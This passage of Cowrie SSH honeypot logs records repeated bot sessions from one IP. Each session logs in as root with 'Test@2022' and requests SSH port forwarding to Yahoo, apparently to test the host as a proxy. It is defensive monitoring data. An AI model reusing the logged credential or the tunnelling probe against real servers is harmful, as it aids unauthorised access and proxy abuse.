6-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.574443Z","src_ip":"213.209.150.239","session":"740f099968a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.857109Z","src_ip":"213.209.150.239","session":"740f099968a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13125,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13125","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.914880Z","session":"740f099968a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.971757Z","src_ip":"213.209.150.239","session":"740f099968a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19830,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19830","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.127037Z","session":"740f099968a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.183891Z","src_ip":"213.209.150.239","session":"740f099968a6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.241667Z","src_ip":"213.209.150.239","session":"740f099968a6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63077,"dst_ip":"1.2.3.4","dst_port":22,"session":"781cba606c19","protocol":"ssh","message":"New connection: 213.209.150.239:63077 (1.2.3.4:22) [session: 781cba606c19]","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.297723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.298439Z","src_ip":"213.209.150.239","session":"781cba606c19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.355448Z","src_ip":"213.209.150.239","session":"781cba606c19"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.638618Z","src_ip":"213.209.150.239","session":"781cba606c19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5937,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5937","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.697073Z","session":"781cba606c19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.754026Z","src_ip":"213.209.150.239","session":"781cba606c19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14754,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14754","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.911196Z","session":"781cba606c19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:08.968053Z","src_ip":"213.209.150.239","session":"781cba606c19"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.026262Z","src_ip":"213.209.150.239","session":"781cba606c19"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63121,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b3505eb3be2","protocol":"ssh","message":"New connection: 213.209.150.239:63121 (1.2.3.4:22) [session: 3b3505eb3be2]","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.081600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.082458Z","src_ip":"213.209.150.239","session":"3b3505eb3be2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.139063Z","src_ip":"213.209.150.239","session":"3b3505eb3be2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.421509Z","src_ip":"213.209.150.239","session":"3b3505eb3be2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":29106,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29106","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.478966Z","session":"3b3505eb3be2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.535502Z","src_ip":"213.209.150.239","session":"3b3505eb3be2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":8633,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8633","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.690940Z","session":"3b3505eb3be2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.747463Z","src_ip":"213.209.150.239","session":"3b3505eb3be2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.805237Z","src_ip":"213.209.150.239","session":"3b3505eb3be2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63163,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f84a9ac69ce","protocol":"ssh","message":"New connection: 213.209.150.239:63163 (1.2.3.4:22) [session: 8f84a9ac69ce]","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.851459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.852497Z","src_ip":"213.209.150.239","session":"8f84a9ac69ce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:09.899773Z","src_ip":"213.209.150.239","session":"8f84a9ac69ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.134572Z","src_ip":"213.209.150.239","session":"8f84a9ac69ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":3443,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3443","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.182718Z","session":"8f84a9ac69ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.230127Z","src_ip":"213.209.150.239","session":"8f84a9ac69ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":31448,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:31448","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.365481Z","session":"8f84a9ac69ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.412749Z","src_ip":"213.209.150.239","session":"8f84a9ac69ce"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.462031Z","src_ip":"213.209.150.239","session":"8f84a9ac69ce"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63206,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b674323a9d6","protocol":"ssh","message":"New connection: 213.209.150.239:63206 (1.2.3.4:22) [session: 9b674323a9d6]","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.517678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.518688Z","src_ip":"213.209.150.239","session":"9b674323a9d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.575037Z","src_ip":"213.209.150.239","session":"9b674323a9d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.857158Z","src_ip":"213.209.150.239","session":"9b674323a9d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":1678,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1678","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.914767Z","session":"9b674323a9d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:10.971442Z","src_ip":"213.209.150.239","session":"9b674323a9d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":12556,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12556","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.127087Z","session":"9b674323a9d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.183672Z","src_ip":"213.209.150.239","session":"9b674323a9d6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.240988Z","src_ip":"213.209.150.239","session":"9b674323a9d6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63258,"dst_ip":"1.2.3.4","dst_port":22,"session":"a115d1451798","protocol":"ssh","message":"New connection: 213.209.150.239:63258 (1.2.3.4:22) [session: a115d1451798]","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.296778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.297651Z","src_ip":"213.209.150.239","session":"a115d1451798"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.354308Z","src_ip":"213.209.150.239","session":"a115d1451798"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.636757Z","src_ip":"213.209.150.239","session":"a115d1451798"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4514,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4514","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.694888Z","session":"a115d1451798"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.751606Z","src_ip":"213.209.150.239","session":"a115d1451798"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18185,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18185","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.907118Z","session":"a115d1451798"}
